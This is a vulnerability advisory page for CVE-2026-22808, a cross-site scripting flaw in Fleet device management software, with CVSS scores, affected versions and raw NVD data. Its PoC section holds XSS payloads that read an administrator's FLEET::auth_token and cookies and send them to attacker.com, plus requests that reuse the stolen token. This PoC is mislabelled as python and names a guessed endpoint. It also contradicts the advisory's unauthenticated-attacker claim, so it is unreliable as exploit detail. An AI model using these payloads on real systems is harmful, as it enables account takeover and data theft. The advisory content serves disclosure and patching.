Security Vulnerability Report
中文
CVE-2026-22808 CVSS 5.4 MEDIUM

CVE-2026-22808

Published: 2026-01-21 22:15:49
Last Modified: 2026-02-18 15:31:04
Source: [email protected]

Description

fleetdm/fleet is open source device management software. Prior to versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, if Windows MDM is enabled, an unauthenticated attacker can exploit this XSS vulnerability to steal a Fleet administrator's authentication token (FLEET::auth_token) from localStorage. This could allow unauthorized access to Fleet, including administrative access, visibility into device data, and modification of configuration. Versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fleetdm:fleet:4.77.0:*:*:*:*:*:*:* - VULNERABLE
fleetdm/fleet < 4.53.3
fleetdm/fleet < 4.75.2
fleetdm/fleet < 4.76.2
fleetdm/fleet < 4.77.1
fleetdm/fleet < 4.78.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-22808 PoC - XSS to steal FLEET::auth_token from localStorage // Target: Fleet instances with Windows MDM enabled // Malicious Payload (inject into vulnerable field) const xssPayload = ` <script> // Steal FLEET::auth_token from localStorage const token = localStorage.getItem('FLEET::auth_token'); if (token) { // Send token to attacker-controlled server fetch('https://attacker.com/exfil?token=' + encodeURIComponent(token) + '&cookie=' + document.cookie, { mode: 'no-cors' }); } </script> `; // Alternative inline payload const inlinePayload = ` <img src=x onerror=" const token = localStorage.getItem('FLEET::auth_token'); fetch('https://attacker.com/log?data=' + btoa(token)); "> `; // Step 1: Inject payload via API or UI field // POST /api/v1/fleet/devices (or similar vulnerable endpoint) const injectRequest = { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <attacker_token>' }, body: JSON.stringify({ hostname: '<script>...steal token...</script>', platform: 'windows', mdminfo: '<img src=x onerror=...>' }) }; // Step 2: Wait for admin to visit affected page // The injected script will execute and exfiltrate the token // Step 3: Use stolen token for unauthorized access const hijackRequest = { method: 'GET', headers: { 'Authorization': 'Bearer <STOLEN_TOKEN>' }, url: 'https://fleet.example.com/api/v1/fleet/admin/users' }; console.log('[+] Payload ready for injection'); console.log('[+] Target: Fleet with Windows MDM enabled'); console.log('[+] Objective: Steal FLEET::auth_token from localStorage');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22808", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:49.233", "lastModified": "2026-02-18T15:31:03.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fleetdm/fleet is open source device management software. Prior to versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, if Windows MDM is enabled, an unauthenticated attacker can exploit this XSS vulnerability to steal a Fleet administrator's authentication token (FLEET::auth_token) from localStorage. This could allow unauthorized access to Fleet, including administrative access, visibility into device data, and modification of configuration. Versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM."}, {"lang": "es", "value": "fleetdm/fleet es software de gestión de dispositivos de código abierto. Antes de las versiones 4.78.2, 4.77.1, 4.76.2, 4.75.2 y 4.53.3, si Windows MDM está habilitado, un atacante no autenticado puede explotar esta vulnerabilidad XSS para robar el token de autenticación de un administrador de Fleet (FLEET::auth_token) de localStorage. Esto podría permitir el acceso no autorizado a Fleet, incluyendo acceso administrativo, visibilidad de los datos del dispositivo y modificación de la configuración. Las versiones 4.78.2, 4.77.1, 4.76.2, 4.75.2 y 4.53.3 solucionan el problema. Si una actualización inmediata no es posible, los usuarios de Fleet afectados deberían deshabilitar temporalmente Windows MDM."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.53.3", "matchCriteriaId": "58B2870D-823A-4862-A51B-B3F86C60D89B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.75.0", "versionEndExcluding": "4.75.2", "matchCriteriaId": "E363A7DF-0880-44B8-82A6-0192D1D43471"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.76.0", "versionEndExcluding": "4.76.2", "matchCriteriaId": "53B5B8B6-F8C9-45E2-A160-D5834B1F3D61"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fleetdm:fleet:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.78.0", "versionEndExcluding": "4.78.2", "matchCriteriaId": "B2A64FBB-EFC6-4BB3-B9C7-0A3D754DCF25"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fleetdm:fleet:4.77.0:*:*:*:*:*:*:*", "matchCriteriaId": "AE525B6A-8AF1-4D33-8EE9-FFD6A1C4F3F8"}]}]}], "references": [{"url": "https://github.com/fleetdm/fleet/security/advisories/GHSA-gfpw-jgvr-cw4j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.